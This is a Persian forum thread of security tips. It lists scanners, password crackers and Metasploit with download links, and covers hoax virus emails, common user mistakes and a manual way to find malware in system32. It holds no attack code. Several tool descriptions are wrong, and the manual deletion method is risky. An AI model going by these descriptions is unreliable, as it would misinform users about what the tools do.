یکی از مسائل مهمی که همواره کاربران چه در سیستم های شخصی و چه در داخل شبکه ها با آن روبرو هستند بحث امنیت است. بسیاری از کاربران امنیت سیستم خود را به دست آنتی ویروس ها می سپارند. اما آنتی ویروس ها معمولأ حجم زیادی از CPU را اشغال میکنند و معمولأ برنامه های سنگینی هستند. ابزارهای کوچک و ناشناخته ای نیز وجود دارند که در عین حال بسیار کارآمد هستند. در این ترفند قصد داریم به معرفی تعداد زیادی از این برنامه های امنیتی که امنیت سیستم شما را در برابر هکرها تضمین میکند بپردازیم. لینک دانلود این برنامه های سبک نیز موجود میباشند.
کشف حفره های امنیتی
Paros (http://www.google.co.in/url?q=http://www.parosproxy.org/functions.shtml&sa=X&oi=smap&resnum=1&ct=result&cd=2&usg=AFQjCNHhtc_H_wv-3p0v29eFLovXlMWErQ) :اسکن سایتهای اینترنتی و تشخیص سایتهای آلوده به کدهای مخرب.
Netcat (http://netcat.sourceforge.net/) : یافتن عوامل مشکل زا در شبکه.
Network Scanner (http://www.softperfect.com/products/networkscanner/) : جستجوی پورت های باز.
Angry IP-Scanner (http://www.soft32.com/download_572.html) : یک اسکنر IP و Port سریع.
Nmap (http://insecure.org/nmap/) : نمایش پورتهای باز و گزارش آنها.
AiO secretmaker (http://www.easywebcreator.com/workathome0/all-in-one) : حفاظت در برابر برنامه های اجرا شونده خودکار.
Airsnort (http://airsnort.shmoo.com/) : تصدیق کننده کلیدهای WEP در شبکه Wi-Fi.
Whisker (http://www.securityfocus.com/tools/727) : تست وب سرور برای حفره های امنیتی.
amap (http://www.attackprevention.com/Security_Tools?gclid=CML9oJTNgY8CFQMkegodKAsH3A) : تشخیص پورت های باز.
Wikto (http://www.sensepost.com/research/wikto/) : یافتن برنامه های مخرب در وب سرور.
WinHTTrack (http://www.httrack.com/) : بازسازی وب سایت ها بر روی هارد دیسک.
HTTPrint (http://www.net-square.com/httprint/) : کشف برنامه های مخرب.
Nikto (http://www.cirt.net/code/nikto.shtml) : نسخه خط فرمانی Wikto.
Kismet (http://www.kismetwireless.net/) : کشف اجرا کنندهای خود کار در شبکه Wi-Fi.
Netstumbler (http://www.netstumbler.com/) : تشخیص دهنده برنامه های مخرب در شبکه Wi-Fi.
Cain&Abel (http://www.oxid.it/cain.html) : یافتن پسوردهای کد شده.
John the Ripper (http://www.openwall.com/john/) : یافتن پسوردهای کد شده.
THC Hydra (http://www.thc.org/thc-hydra/) : کشف حفره های امنیتی در شبکه.
Pwdump (http://www.symantec.com/security_response/writeup.jsp?docid=2005-032616-0025-99) : باز گردانی پسوردها وارد شده در شبکه.
Rainbow Crack (http://www.antsight.com/zsl/rainbowcrack/) : چک کردن امنیت پسوردها.
برنامه های رفع مشکلات امنیتی
Attack Tool Kit (http://www.securityfocus.com/tools/3555) : شبیه سازی حملات از طریق اکسپلویت.
Metasploit Framework (http://www.metasploit.com/projects/Framework/) :چک نمودن شبکه.
a-squared free (http://www.emsisoft.com/) : یافتن بیش از 90.000 تروجان .
Blacklight (http://www.f-secure.com/blacklight/) : آشکار کردن rootkitهای مخفی.
Rootkit Revealer (http://www.microsoft.com/technet/sysinternals/utilities/RootkitRevealer.mspx) : اسکنر Rootkit برای حرفه ای ها.
Hijack This (http://www.spywareinfo.com/%7Emerijn/downloads.html) : آشکار کردن بدافزارها.
Spybot Search&Destroy (http://www.safer-networking.org/) : از بین برنده نرم افزارهای جاسوسی.
Antivir (http://www.free-av.com/) : اسکنر ویروس وسیع.
Spyware Blaster (http://www.javacoolsoftware.com/spywareblaster.html) : از بین برنده نرم افزارهای جاسوسی.
Trojan Check (http://www.windowsecurity.com/trojanscan/trojanscan.asp) : یافتن تروجان ها.
BitDefender Pro (http://www.bitdefender.com/) : حفاظت کننده حرفه ای در برابر ویروسها.
امنیت سیستم شخصی
Snort (http://www.snort.org/) : آشکار نمودن برنامه های مزاحمی که بدون اجازه اجرا میشوند.
IDSCenter (http://www.engagesecurity.com/products/idscenter/) : نسخه گرافیکی برنامه Snort.
Ossec-Hids (http://www.ossec.net/) : کشف برنامه های مخرب بدون (ترفندستان) اجازه برای نصب.
Base Displays (http://www.base-displays.com/) : آشکار نمودن برنامه های مزاحمی که بدون اجازه اجرا میشوند.
Sguil IDS (http://www.l0t3k.org/security/tools/ids/) : آشکار نمودن برنامه های مزاحمی که بدون اجازه اجرا میشوند..
GPG4Win (http://www.gpg4win.org/) : رمزنگاری کردن اطلاعات مهم.
OpenSSL (http://www.techdune.com/2007/10/09/amazing-xp-tools-to-arm-your-pc-from-hackers/OpenSSL) : حفاظت واقعی در برابر ارتباطات SSL.
Tor Encodes (http://tor.eff.org/) : حفاظت در برابر اتصال TCP/IP.
Armor2net (http://www.armor2net.com/) : یک دیوار آتشین.
Stunnel (http://www.stunnel.org/) : حفاظت کننده SSL و رمزنگاری ایمیل ها.
OpenVPN (http://openvpn.net/) : ارسال اطلاعات از طریق یک کارت شبکه مجازی.
Truecrypt (http://www.truecrypt.org/) : رمزنگاری کامل درایوها.
ArchiCryptStealth (http://www.archicrypt-shop.com/index.html) : مخفی کننده جستجوکننده ها.
SpyBlocker (http://www.spyblocker-software.com/spyblocker/) : مسدود کننده نرم افزارهای جاسوسی.
Behzad AZ
06-30-2010, 08:13 AM
خیلی اوقات پیش می آید که کامپیوتر شما دچار ویروسی می شود که امکان اسکن و تشخیص آن توسط آنتی ویروس وجود ندارد و یا آنکه ویروس با تشخیص نصب بودن آنتی ویروس بروی سیستمتان عملکرد آن را دچار اختلال می کند و مانع از این می شود که شما بتوانید از آنتی ویروس خود برای اسکن کامپیوتر استفاده کنید. در این شرایط چه باید کرد؟ آیا راهی وجود دارد که بتوان در این شرایط کامپیوتر را خودمان اسکن کنیم و مشکل به وجود آمده در آنتی ویروس را برطرف کرد؟ پاسخ تمامی این سوالات مثبت است! در این ترفند قصد داریم به معرفی روشی ابتکاری و در عین حال کاربردی بپردازیم که با استفاده از آن میتوانید کامپیوتر خود را شخصأ اسکن کنید و ویروس موجود را پاک کنید ، بدون بهره گیری از هیچ نوع آنتی ویروسی!
اولین قدم برای اسکن کردن کامپیوترتان نمایش فایل های مخفی در کامپیوتر می باشد.
برای انجام این کار : ابتدا با مراجعه به My Computer بروی منوی Tools کایک کنید و از منوی حاصل بروی عبارت Folder Options کلیک کنید. سپس بروی برگه View کلیک کنید و در این برگه تیک کنار عبارت های Show Hidden Files and Folders را فعال کنید و تیک کنار عبارت Hide Extensions For Known File Types را بردارید و بروی عبارت OK کلیک نمایید.
اینک از طریق مسیر C:/Windows/system32 به پوشه System32 مراجعه کنید. پس از ورود به پوشه system32 بروی منوی View کلیک کنید و از منوی حاصل عبارت Details را انتخاب کنید.
حال در پوشه system32 بروی جدا کننده Date Modified کلیک کنید و آنرا به سمت راست بکشید به طوری که تاریخ تمامی فایل ها یه طور کامل نمایش داده شود.
فایل های نمایش داده شده در پوشه system32 فایل های سیستمی مربوط به ویندوز می باشد که اکثرا با پسوند dll می باشد و این بخش معمولا مورد هدف ویروس ها و Spyware قرار می گیرد و خود را در بین این فایل ها مخفی می کنند.
اگر دقت کنید متوجه خواهید شد که اکثر این فایلهای قرار گرفته در این بخش دارای یک زمان مشخص می باشد و این زمانها (مثلا 8/10/2004) معرف این می باشد که مایکروسافت در این تاریج برنامه مربوط به فایل مورد نظر را به پایان رسانیده است و در واقع این زمان ها هیچ ربطی به زمان نصب ویندوز ندارد. حال اگر ویروس و یا spyware به این بخش حمله کند زمان آن با زمان فایل های سیستمی موجود در پوشه system32 مطابق ندارد و زمانی جدید تر از زمان مربوط به فایلهای سیستمی ویندوز خواهد بود و به راحتی از طریق مشاهده زمان های قرار گرفته در Date Modified قابل تشخیص می باشد. البته نکته بسیار مهم که باید توجه شود این است که نصب یک سخت افزار جدید و یا یک نرم افزار خاص می تواند فایلی را در این بخش کپی کند که زمان آن با زمان فایل های سیستم مطابق ندارد.
پس برای اینکه فایلی را در این بخش به اشتباه پاک نکنید روشی را مطرح میکنیم که این اشتباه رخ ندهد:
اگر میان فایل های واقع در پوشه system32 به فایلی برخورد کردیدکه تاریخ آن با تاریخ فایل های سیستمی ویندوز مطابقت نداردبروی این فایل کلیک راست کنید و گزینه Properties را انتخاب نمایید. سپس در پنجره Properties بروی برگه Version کلیک کنید و در این برگه نام کمپانی و ورژن فایل مورد نظر را مطالعه کنید.
اگر اطلاعات این فایل شامل نام کمپانی و خیلی اطلاعات دیگر برایتان آشنا نبود نام فایل مورد نظر را در موتور جستجو گر گوگل تایپ کنید و اگر در نتایج جستجو به این اشاره شده بود که این فایل ویروس است حتما آن را پاک کنید ولی اگر در نتایج جستجو به آلوده بودن این فایل اشاره نشده بود این فایل به واسطه یک سخت افزار و یا نرم افزاری به وجود آمده است.
Behzad AZ
06-30-2010, 08:14 AM
یکی از ساده ترین روشهای هکرها و ویروس نویسان، استفاده از پست الکترونیکی یا ایمیل برای به خطر انداختن امنیت کاربران است. این روش هر اندازه که ساده صورت میگیرد به همان سادگی نیز قابل تشخیص است. چرا که تنها با متون خاص شما را ترقیب به دریافت فایل الصاقی یا کلیک روی یک لینک میکنند. در این ترفند قصد داریم دست این افراد را برای شما رو کنیم تا دیگر به ساده ترین شکل دچار مشکلات امنیتی نشوید.
یک مشکل بسیار گسترده در اینترنت وجود دارد و آن پیغامهای الکترونیکی که در مورد یک ویروس هشدار می دهند و این هشدار در مورد یک Email با یک عنوان (Subject) مشخص می باشد که این Emailها ویروس های خطرناک هستند و به کامپیوتر شما آسیب می رسانند.
مثال:
Please do not open up any mail that has this title.
It will erase your whole hard drive. This is a new
e-mail virus and not a lot of people know about
it, just let everyone know, so they won't be a victim.
Please forward this e-mail to you friends!!!
Remember the title: JOIN THE CREW.
مثال دیگر:
Subject: VIRUS WARNING VERY IMPORTANT
Please read the following message we received from a client.
If you receive an email titled "It Takes Guts to Say 'Jesus'"
DO NOT open it. It will erase everything on your hard drive. So, you must delete it.
Forward this E-MAIL out to as many people as you can. This is a new, very
malicious virus and not many people know about it. This information was
announced yesterday morning from IBM; please share it with everyone
that might access the internet. Once again, pass this along to EVERYONE in
your address book so that this may be stopped. AOL has said that this is
a very dangerous virus and that there is NO remedy for it at this time.
Please practice cautionary measures
.
اگر شما ایمیلی مانند این دیدید آن را برای کسی نفرستید! ویروسهای "Jion The Crew" و "It Takes Guts to Say 'Jesus'" شوخی هستند! ویروسهای شوخی دیگری وجود دارند مانند:
"Win a Hliday" , "AOL4Free" , "Pen Pal Greetings", "ghost" , "Deeyenda"
و بد نام ترین آنها "Good times" است.
ویژگیهای اخطار ویروسهای شوخی:
1. تأکید بسیار.
2. یک هشدار که ویروس فقط با باز کردن پیغام فعال می شود (شما نمی توانید فقط با باز کردن یک پیفام آلوده شوید مگر اینکه یک پیوست (attachment) را باز کنید.
3. کلمات « این یک ویروس جدید است که بسیاری از مردم آن را نمی شناسند » در آن دیده می شود.
4. دستور العملها به شما می گویند که با دنبال کردن یک لینک آن را برایکسانیکه می شناسید بفرستید.
5. با اشاره به اینکه ویروس روز قبل بوسیله یک شرکت یا گروه کامپیوتری معتبر مانند "IBM" یا "Microsoft' و یا... اعلام شده است می خواهند هشدار خود موجه جلوه دهند.
در اینجا یک مثال از یک هشدار حقیقی در مورد ویروس وجود دارد:
Hi all,
There is a virus (a "worm", actually) currently doing the rounds that
comes packaged in a file called PrettyPark.exe attached to an email.
Apparently it has been around since May last year, but has proliferated
recently and is currently by far the most "popular" subject of enquiries
at Symantec's anti-virus research center.
The usual rules apply: don't open it.
Information (including a fix if you are infected) is available at this
site:
http://www.symantec.com/avcenter/venc/data/prettypark.worm.html
Good luck, Take care.
ویژگیهایی که نشان می دهند این ویروس مربوط به یک ویروس واقعی است عبارتند از:
1. پیغام به شکل ساده و زبان منطقی و مستدل بیان شده است (بدون هیچگونه بزرگنمایی در لغات)
2. پیغام در مورد باز کردن یک بایل الصاقی (attachment) هشدار نی دهد
3. پیغام آدرس سایت معتبری را می دهد که در آن می توانید در مورد ویروس اطلاعات بیشتری پیدا کنید.
4. در پیغام اطلاعاتی در مورد اینکه اگر کامپیوتر شما آلوده به ویروس شد چه کار باید انجام دهید به شما اطلاعاتی میدهد.
5. در پیغام از شما خواسته نمی شود که آن را برای کسی بفرستید.
Behzad AZ
06-30-2010, 08:14 AM
یکی از مشکلاتی که کاربران -به ویژه کاربران ایرانی دارند- استفاده از آنتی ویروس ها برای اسکن کردن سیستم خود از وجود ویروس است. مشکلاتی از قبیل حجم زیاد نرم افزارهای آنتی ویروس ، نیاز به کرک کردن برای استفاده کامل و... . در این ترفند قصد داریم چندین سرویس آنلاین را به شما معرفی کنیم که با بهره گیری از آنها میتوانید بدون نیاز به آنتی ویروس خاصی، سیستم خود را از طریق اینترنت و به شکلی کاملأ رایگان اسکن کنید.
برای استفاده از این سرویس ها ، کافی است به سایتهای زیر رفته و از قابلیتهای موجود استفاده کنید:
Symantec Security Check (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3NlY3VyaXR5Lm5vcnRvbi5jb20vc3N jdjYvZGVmYXVsdC5hc3A%2FbGFuZ2lkPWllJmFtcDt2ZW5pZD1 zeW0%3D)
McAfee FreeScan (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3VzLm1jYWZlZS5jb20vcm9vdC9tZnM vZGVmYXVsdC5hc3A%2FYWZmaWQ9Mjk0)
Panda ActiveScan (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5wYW5kYXNvZnR3YXJlLmNvbS9 hY3RpdmVzY2FuLw%3D%3D)
Kaspersky lab (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5rYXNwZXJza3kuY29tL3JlbW9 0ZXZpcnVzY2hrLmh0bWw%3D)
Bitdefender (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5iaXRkZWZlbmRlci5jb20vc2N hbi9saWNlbmNlLnBocA%3D%3D)
RAV (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5yYXZhbnRpdmlydXMuY29tL3N jYW4v)
Tarfandestan (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL1RhcmZhbmRlc3Rhbi5jb20%3D)
Trend Micro (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL2hvdXNlY2FsbC50cmVuZG1pY3JvLmN vbS9ob3VzZWNhbGwvc3RhcnRfY29ycC5hc3A%3D)
SYGATE (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3NjYW4uc3lnYXRlLmNvbS8%3D)
AuditMyPc (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5hdWRpdG15cGMuY29tLw%3D%3 D)
لینک سایر مراجع:
VIRUS SCANNERS ON-LINE (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL2Jsb2dzLmRvdG5ldGhlbGwuaXQvdml uY2VudC9Qb3N0XzIwNDYuYXNweA%3D%3D)
Free Antivirus Removal Tools (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL2Jsb2dzLmRvdG5ldGhlbGwuaXQvdml uY2VudC9Qb3N0XzI5NTMuYXNweA%3D%3D)
این ترفند را نیز فراموش نکنید:
اسکن فایل ها بر روی 37 آنتی ویروس به شکل همزمان (http://www.tarfandestan.com/1387/09/07/scan-files-with-37-antivirus-engines.html)
Behzad AZ
06-30-2010, 08:15 AM
در این ترفند قصد داریم به معرفی متداول ترین اشتباهات کاربران در تمامی سطوح دانسته ها بپردازیم. بیشتر این اشتباهات به مسائل امنیتی مربوط میشود. نصب بی رویه نرم افزار خصوصأ نرم افزارهائی که از طریق اینترنت دریافت می گردد ، کلیک بر روی دکمه OK در یک جعبه محاوره ای که ممکن است باعث تغییر تنظیمات یک برنامه و در نهایت رفتار یک کامپیوتر و حتی در برخی موارد از کارافتادن سیستم گردد ،* نمونه هائی اندک در این زمینه می باشند. پیشنهاد میکنیم این ترفند را حتما با دقت مطالعه بفرمایید چرا که ممکن است شما نیز این اشتباهات را مرتکب شوید و خودتان بی خبر باشید!
اتصال کامپیوتر به برق بدون استفاده از یک سیستم حفاظتی به منظور کنترل نوسانات جریان برق:
عدم رعایت این موضوع می تواند باعث صدمه فیزیکی به کامپیوتر و از بین رفتن داده موجود بر روی آن گردد. برخی از کاربران این تصور را دارند که صرفاً پس از بروز یک شوک الکتریکی قوی احتمال بروز مشکل برای سیستم وجود خواهد داشت. ضمن رد این برداشت، می بایست به این نکته اشاره گردد که هر چیزی که بتواند در سیگنال های الکتریکی وقفه ای را ایجاد و جریان برق را مجددا از ابتدا آغاز نماید، می تواند باعث سوزاندن قطعات کامپیوتر گردد. استفاده از برخی وسایل برقی، خصوصا دستگاه هائی* نظیر سشوار و هیتر که به ولتاژ بالائی نیاز دارند، می تواند باعث ایجاد نوسانات شدید گردد. پس از قطع جریان برق و اتصال مجدد آن نیز ممکن است تا رسیدن به یک سطح ولتاژ مطلوب، زمانی بطول انجامد (هر چند اندک) و در همین فاصله ممکن است مشکلات خاصی برای برخی از دستگاه ها ایجاد گردد.
برای حفاظت سسیستم در مقابل خرابی ناشی از نوسانات شدید جریان برق، می بایست از یک محافظ مناسب استفاده نمود. استفاده از UPS (برگرفته از Uninterruptible Power Supply) در بسیاری از موارد نسبت به دستگاه های محافظ ترجیح داده شود،* چراکه این نوع دستگاه ها دارای امکانات مناسبی می باشند که می توان علیرغم قطع جریان برق همچنان از کامپیوتر استفاده و در صورت لزوم سیستم را بطور موفقیت آمیز خاموش نمود.
استفاده از اینترنت بدون فایروال:
تعداد زیادی از کاربران (خصوصا کاربرانی که از طریق منزل به اینترنت متصل می شوند)، کامپیوتر خود را به مودم متصل و بلافاصله از اینترنت استفاده می نمایند، بدون این که نسبت به این موضوع آگاهی داشته باشند که خود را در معرض چه تهدیداتی قرار داده اند. هر کامپیوتر متصل به اینترنت می بایست با بکارگیری فایروال، حفاظت گردد. فایروال، می تواند بخشی درون مودم/روتر و یا یک دستگاه جداگانه باشد که بین مودم/روتر و کامپیوتر قرار می گیرد و یا یک نرم افزار خاص باشد که بر روی کامپیوتر نصب می گردد (نظیر فایروال ارائه شده به همراه ویندوز XP). نصب یک فایروال به تنهایی کافی نبوده و می بایست پیکربندی آن را با رعایت مسائل امنیتی انجام داد.
قصور در اجرا و یا بهنگام سازی نرم افزارهای آنتی ویروس و آنتی Spyware:
بدون شک، برنامه های آنتی ویروس دارای یک نقش اساسی به منظور ایمن سازی یک کامپیوتر می باشند. به دنبال نصب اینگونه نرم افزارها ممکن است کاربران با مشکلات خاصی در خصوص اجرای برخی برنامه های کامپیوتری مواجه و یا به منظور نگهداری و بهنگام سازی آنان هزینه های خاصی را متقبل شوند، ولی مسائل فوق نمی تواند دلایل قانع کننده و منطقی به منظور عدم نصب و بهنگام سازی یک نرم افزار آنتی ویروس بر روی سیستم باشد. برنامه های مخرب که نرم افزارهای آنتی ویروس آنان را به عنوان ویروس، تروجان و یا کرم ها تشخیص خواهند داد، علاوه بر این که ممکن است مشکلات خاصی را برای یک سیستم ایجاد نمایند، می تواند یک شبکه کامپیوتری را نیر با مشکلات عدیده ای مواجه نموده و حتی باعث از کارافتادن سرویس های شبکه گردند.
Spyware، نوع دیگری از تهدیدات فزاینده در عصر حاضر می باشند که بر روی کامپیوتر کاربران و بدون آگاهی آنان نصب و اقدام به جمع آوری اطلاعات و ارسال آنان به یک مکان دیگر می نمایند. برنامه های آنتی ویروس، اغلب قادر به تشخیص و برخورد مناسب با این نوع برنامه های مخرب نمی باشند، بنابراین می بایست از یک نرم افزار اختصاصی تشخیص Spyware استفاده گردد.
نصب و Uninstall برنامه های مختلف خصوصاً نسخه های Beta:
تعداد زیادی از کاربران کامپیوتر تمایل دارند که از آخرین فن آوری ها و نرم افزارهای موجود استفاده نمایند. این گروه از کاربران، همواره اقدام به نصب نسخه های جدید نرم افزارها بر روی سیستم خود می نمایند. نسخه های Beta معمولا رایگان می باشند و این فرصت را در اختیار کاربران علاقه مند قرار می دهند که قبل از ارائه نسخه نهائی که اکثر کاربران با آن کار خواهند کرد، با ویژگی ها و پتانسیل های آن آشنا شوند. همچنین، امروزه می توان نرم افزارهای Shareware و Freeware متعددی را در اینترنت یافت که کاربران علاقه مند و کنجکاو را ترغیب به دریافت و نصب آنان بر روی سیستم بدون توجه به مسائل امنیتی می نماید.
به موازات افزایش تعداد نرم افزارهای نصب شده و یا متعاقب آن Uninstall کردن آنها، احتمال بروز مشکلات متعددی برای کاربران وجود خواهد داشت. حتی در صورتی که نرم افزارهای اشاره شده قانونی باشند، با نصب و Uninstall آنها، ممکن است برای ریجستری مشکل ایجاد گردد چرا که تمامی برنامه های Uninstall قادر به حذف تمامی تنظمیات انجام شده در ریجستری نمی باشند. مشکل فوق، در نهایت کند شدن سیستم را به دنبال خواهد داشت.
پیشنهاد می گردد، صرفاً برنامه هائی را که ضرورت استفاده واقعی از آنان احساس و از عملکرد آنان اطمینان حاصل شده است را بر روی سیستم نصب نمود. همچنین، می بایست تعداد دفعات نصب و Uninstall نرم افزار را به حداقل مقدار ممکن رساند.
پرکردن فضای ذخیره سازی هارد دیسک و تقسیم آن به بخش های مختلف (Fragmentation):
یکی از نتایج نصب و Uninstall کردن برنامه ها و یا اضافه و حذف داده، Fragmentation دیسک است. علت بروز مشکل فوق به ماهیت و روش ذخیره اطلاعات برمی گردد. در یک دیسک جدید، از بخش های پیوسته و پشت سرهم (موسوم به کلاستر) در زمان ذخیره یک فایل استفاده می گردد. در صورتی که اقدام به حذف فایلی گردد که پنج کلاستر را اشغال کرده است و در ادامه فایل جدیدی را ایجاد نمائیم که به هشت کلاستر جهت ذخیره شدن نیاز داشته باشد، پنج کلاستر اولیه به آن اختصاص داده شده و سه کلاستر دیگر از بخش دیگری بر روی دیسک به آن اختصاص داده می شود. بدین ترتیب، اطلاعات موجود در فایل در دو مکان متفاوت ذخیره می گردند. در ادامه و به منظور دستیابی به فایل، هدهای هارد دیسک می بایست با قرار گرفتن در مکان های مختلف اقدام به بازیابی اطلاعات یک فایل نمایند. بدین ترتیب، سرعت دستیابی به فایل کاهش و در صورتی که فایل اشاره شده مربوط به یک برنامه باشد، سرعت آن برنامه نیز کاهش خواهد یافت.
برای استفاده از برنامه Disk Defragmenter در ویندوز می توان از مسیر Programs > Accessories > System Tools برنامه را فعال و یا از سایر برنامه های موجود استفاده نمود. برنامه های فوق با سازماندهی مجدد فایل ها، آنها را حتی المقدور در مکان های پشت سرهم قرار خواهند داد. بدین تریتب، سرعت دستیابی به اطلاعات ذخیره شده بر روی هارد دیسک افزایش خواهد یافت.
باز کردن تمامی ضمائم همراه نامه های الکترونیکی:
فایل های ضمیمه ارسالی همراه یک Email می تواند مشکلات امنیتی متعددی را برای کاربران ایجاد نماید. حذف اطلاعات موجود بر روی سیستم و یا ارسال ویروس برای افرادی که آدرس آنان در لیست تماس می باشد از جمله مشکلات فوق می باشد. متداولترین فایل های ضمیمه خطرناک، فایل هائی اجرائی (فایل هائی که توان اجرای کد را دارند) با انشعاب Exe. و یا Cmd. می باشند. فایل هائی که خود توان اجرای مستقیم را ندارند نظیر فایل های Doc. برنامه Word و یا فایل های Xls. برنامه اکسل، نیز می توانند (ترفندستان) حاوی کدهای مخرب باشند. اسکریپت ها (Vbscript ،Javascript و فلش) نیز مستقیما اجرا نمی شوند ولی می توانند توسط سایر برنامه ها اجرا شوند.
برخی از کاربران این تصور را دارند که فایل های متن با انشعاب Txt. و یا فایل های گرافیکی (Gif ،.Jpg ،.Bmp.) ایمن می باشند ولی همواره اینچنین نخواهد بود. انشعاب یک فایل می تواند جعل شود و مهاجمان از تنظیمات پیش فرض ویندوز که انشعاب فایل های متداول را نمایش نمی دهد، سوء استفاده نمایند. به عنوان نمونه، فایل File.Jpg.Exe که انشعاب واقعی آن مخفی است به صورت File.Jpg نمایش داده خواهد شد و کاربران فکر می کنند که فایل فوق یک فایل گرافیکی است ولی در واقع یک برنامه مخرب است.
کاربران کامپیوتر می بایست صرفا در مواردی که انتظار دریافت یک Email به همراه ضمیمه مورد نظر را از یک منبع تائید شده و در آن زمان خاص دارند، اقدام به بازنمودن فایل های ضمیمه نمایند. حتی در صورتی که یک نامه الکترونیکی به همراه فایل ضمیمه ای را دریافت می نمائید که نسبت به هویت ارسال کننده آن هیچگونه تردیدی وجود ندارد، این احتمال وجود خواهد داشت که آدرس فوق توسط مهاجمان جعل و یا توسط کامپیوتری آلوده به ویروس و بدون اطلاع صاحب آن ارسال شده باشد.
کلیک بر روی هر چیز:
باز نمودن فایل های ضمیمه تنها نوع کلیک بر روی موس نمی باشد که می تواند مشکلات امنیتی متعددی را برای کاربران ایجاد نماید. کلیک بر روی لینک موجود در یک نامه الکترونیکی و یا صفحه وب نیز می تواند کاربران را به سمت یک وب سایت مخرب هدایت نماید. در این نوع سایت ها، احتمال انجام هرگونه عملیات مخربی وجود خواهد داشت. پاک کردن هارد دیسک، نصب یک Backdoor که به مهاجمان این امکان را خواهد داد تا کنترل یک سیستم را بدست بگیرند، نمونه هائی در این زمینه می باشد.
کلیک بر روی لینک های نامناسب، می تواند کاربران را به سمت یک وب سایت نامناسب نظیر سایت های پرونوگرافی، موزیک ها و یا نرم افزارهای سرقت شده و سایر محتویاتی که ممکن است برای کاربران مشکلاتی را به دنبال داشته باشد، هدایت نماید. قبل از کلیک بر روی یک لینک، می بایست نسبت به عواقب آن فکر کرد و هرگز جذب پیام های اغواکننده نگردید.
اشتراک فایل ها و اطلاعات:
شاید به اشتراک گذاشتن برخی چیزها در زندگی روزمره امری مطلوب باشد (نظیر اشتراک دانش) ولی در زمان حضور در یک شبکه با کاربران گمنام و بیشمار، اشتراک فایل ها و... می تواند تهدیدات امنیتی خاص خود را برای کاربران به دنبال داشته باشد. در صورتی که امکان اشتراک فایل و چاپگر فعال است، سایر کاربران می توانند از راه دور به سیستم متصل و به داده موجود بر روی آن دستیابی داشته باشند. حتی المقدور می بایست گزینه File And Printer Sharing غیرفعال گردد و در صورتی که لازم است برخی فولدرها به اشتراک گذاشته شوند، می بایست از آنان در دو سطح متفاوت حفاظت نمود: مجوزهای Share-Level و مجوزهای File-Level (مجوزهای مبتنی بر Ntfs). در چنین مواردی می بایست از استحکام رمزهای عبور در نظر گرفته شده برای Local Account و Local Administrator نیز اطمینان حاصل نمود.
انتخاب رمزهای عبور ضعیف:
انتخاب رمزهای عبور ضعیف می تواند کاربران را در معرض تهدیدات امنیتی متعددی قرار دهد. حتی اگر کاربران وابسته به شبکه ای نمی باشند که مدیریت شبکه از آنان می خواهد که از رمزهای عبور قوی استفاده و بطور مستمر آنها را تغییر دهند، می بایست از رمزهای عبور قوی استفاده گردد. از رمزهای عبوری که امکان حدس آنها به سادگی وجود دارد نظیر تاریخ تولد، نام فرد مورد علاقه، شماره شناسنامه و... نمی بایست استفاده گردد. تشخیص رمزهای عبور طولانی برای مهاجمان بمراتب مشکل تر است. بنابراین، پیشنهاد می گردد که از رمزهای عبوری با حداقل هشت حرف استفاده گردد (چهارده حرف مناسب تر است). در برخی موارد مهاجمان به منظور تشخیص رمز عبور کاربران از روش هائی موسوم به حملات دیکشنری استفاده می نمایند. بنابراین، نمی بایست رمز عبور خود را از کلماتی انتخاب نمود که مشابه آن در دیکشنری موجود باشد. رمز عبوری را انتخاب ننمائید که به دلیل مشکل بودن بخاطر سپردن آن مجبور به نوشتن آن در یک مکان دیگر شد، چراکه این احتمال وجود خواهد داشت که مهاجمان نیز به آن دستیابی پیدا نمایند. برای ایجاد یک رمز عبور، می توان یک عبارت خاص را در نظر گرفت و از حروف اول هر یک از کلمات آن استفاده نمود.
عدم توجه به ایجاد یک استراتژی خاص برای Backup:
حتی اگر شما تمامی موارد اشاره شده را رعایت نمائید، همچنان این احتمال وجود خواهد داشت که مهاجمان به سیستم شما دستیابی و داده موجود بر روی آن را حذف و یا حتی تمامی اطلاعات موجود بر روی هارددیسک را پاک کنند. بنابراین، لازم است که همواره از اطلاعات مهم موجود Backup گرفته شود و از یک برنامه زمانبندی خاص در این رابطه استفاده گردد.
اکثر کاربران نسبت به گرفتن Backup و مزایای آن آگاهی کامل دارند ولی تعداد زیادی از آنان هرگز این کار را انجام نمی دهند. برخی دیگر اولین Backup را می گیرند ولی آن را به صورت مستمر و سازمان یافته ادامه نمی دهند.
با استفاده از برنامه های موجود در ویندوز نظیر NTBackup و یا سایر نرم افزارها، می توان زمانبندی Backup را بگونه ای انجام داد که این فرآیند بطور اتوماتیک انجام شود. داده Backup را می بایست در یک سرویس دهنده دیگر شبکه و یا درایو Removable و در مکانی متمایز از کامپیوتر فعلی نگهداری نمود.
بخاطر داشته باشید که داده مهمترین چیز برروی یک کامپیوتر است. سیستم عامل و سایر برنامه ها را می توان مجددا نصب نمود ولی بازیابی داده اولیه مشکل و در بسیاری از موارد نیز غیرممکن است.
Behzad AZ
06-30-2010, 08:15 AM
چگونه فایل های آلوده را هنگامی که چت میکنیم شناسایی کنیم؟ این سوالی است که بسیاری از کاربران روزانه از خودشان میپرسند. در دنیای ناامن اینترنت، این سوال یکی از مهم ترین ارکان امنیتی سیستمهای کامپیوتری میباشد. به عنوان مثال در هنگام چت کردن چگونه پی ببریم فایلی که برای ما ارسال شده یک فایل آلوده است یا خیر؟ در این ترفند قصد داریم روش های شناسایی این فایلهای خطرناک را به شما معرفی کنیم.
وقتی شخصی فایلی را برای شما از طریق یاهو مسنجر ارسال می کند در پیغامی که برای شما مبنی بر تایید آن می آید، نام شخص فرستنده، نام فایل، حجم آن و همچنین فرمت و از این قبیل اطلاعات در آن قید شده است. شما باید توجه داشته باشید که آیا فایلی که برای شما ارسال شده از لحاظ نوع و فرمت همان فایلی است که قرار بوده ارسال شود یا خیر؟
